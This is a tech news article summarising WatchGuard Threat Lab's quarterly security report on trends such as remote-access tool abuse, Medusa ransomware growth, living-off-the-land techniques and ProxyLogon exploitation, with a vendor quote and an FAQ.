CIO Influence
IT and DevOps

WatchGuard Threat Lab Report Reveals Surge in Exploits Targeting Remote Access Software

WatchGuard Threat Lab Report Reveals Surge in Exploits Targeting Remote Access Software

Key Research Revelations: An 89% Surge in Endpoint Ransomware Attacks and Decrease in Encrypted Malware Incidents

The recent Internet Security Report from WatchGuard Technologies highlights critical trends and threats in cybersecurity. Researchers from the WatchGuard Threat Lab have emphasized several key findings, including a rise in the abuse of remote access software, cyber adversaries increasingly utilizing password-stealers and info-stealers to pilfer valuable credentials, and a shift among threat actors from scripting to employing alternative living-off-the-land techniques for initiating endpoint attacks. These insights underscore evolving cybersecurity challenges and the need for vigilance against diverse network and endpoint security threats.

PREDICTIONS SERIES 2024 - CIO Influence

“Threat actors continue using different tools and methods in their attack campaigns, making it critical for organizations to keep abreast of the latest tactics to fortify their security strategy. Modern security platforms that include firewalls and endpoint protection software can deliver enhanced protection for networks and devices. But when it comes to attacks that employ social engineering tactics, the end user becomes the last line of defense between malicious actors and their success in infiltrating an organization. It’s important for organizations to provide social engineering education as well as adopt a unified security approach that provides layers of defense, which can be administered effectively by managed service providers.”Corey Nachreiner, Chief Security Officer at WatchGuard

Key Findings from the Internet Security Report

Increased Utilization of Remote Management Tools by Threat Actors

The report highlights a growing trend among threat actors employing remote management tools and software to bypass anti-malware systems. This method, acknowledged by the FBI and CISA, was exemplified by a tech support scam observed by the Threat Lab. The scam led victims to download an unauthorized version of TeamViewer, providing attackers complete remote access to the victim’s computer.

Surge in Medusa Ransomware Variant

Q3 experienced a rise in the Medusa ransomware variant, resulting in an 89% increase in endpoint ransomware attacks. While endpoint ransomware detections seemingly decreased, the emergence of the Medusa variant within the Top 10 malware threats led to an 89% rise in ransomware attacks upon considering these detections.

Shift in Attack Techniques

Threat actors are transitioning away from script-based attacks, favoring alternative living-off-the-land techniques. While malicious scripts decreased by 11% in Q3 and remained the primary attack vector, other methods like Windows living-off-the-land binaries saw a 32% increase. This shift indicates a strategic adaptation by threat actors in response to enhanced protections around scripting languages.

Decrease in Malware via Encrypted Connections

The percentage of malware arriving through encrypted connections declined to 48% in Q3, notably from previous quarters. However, overall, malware detections increased by 14%.

Email-Based Dropper Family

An email-based dropper family, primarily the Stacked variant, was responsible for four of the Top 5 encrypted malware detections in Q3. Threat actors used spear phishing techniques, sending emails with malicious attachments disguised as legitimate documents to deceive end users into downloading malware.

The emergence of Commoditized Malware

A new malware family, Lazy.360502, surfaced among the top threats, delivering the adware variant 2345explorer and the Vidar password stealer. This discovery revealed a connection to a Chinese website offering stolen credentials as a service, highlighting the commoditization of malware.

Network Attack Trends

Network attacks witnessed a 16% increase in Q3, with ProxyLogon as the primary vulnerability targeted, constituting 10% of all network detections.

New Signatures in Top 50 Network Attacks

Three new signatures, encompassing vulnerabilities from PHP, Microsoft .NET Framework, and Drupal, emerged in the Top 50 network attacks, potentially leading to critical exploits.

The findings in this quarterly report from the WatchGuard Threat Lab align with WatchGuard’s Unified Security Platform strategy. The data analyzed in this report is sourced from anonymized, aggregated threat intelligence gathered from active WatchGuard networks and endpoint products. These insights are derived from users who have chosen to participate, directly supporting WatchGuard’s ongoing research initiatives.

FAQs

1. What specific trends in cyber threats did the report emphasize?
The report notes a rising trend in threat actors utilizing remote management tools, shifting from script-based attacks to living-off-the-land techniques, and decreasing malware delivered through encrypted connections.

2. What was the significant rise in ransomware attacks mentioned in the report?
The Medusa ransomware variant contributed to an 89% increase in endpoint ransomware attacks, although endpoint ransomware detections seemed to decrease.

3. What were the notable malware families highlighted in the report?
The report identified the Stacked email-based dropper family and the emergence of Lazy.360502, indicating a connection to a Chinese website offering stolen credentials, illustrating the commoditization of malware.

[To share your insights with us, please write to sghosh@martechseries.com]

Related posts

Introducing MetaVRse Engine 2.0, a Complete Rebuild of the Web-Based, Low-Code, 3D Creation Platform

Hybrid Workforce Boosts Apple Adoption in the Enterprise, New Research Reveals

CIO Influence News Desk

Unveiling TPU v5p and AI Hypercomputer for Next-Gen AI Workloads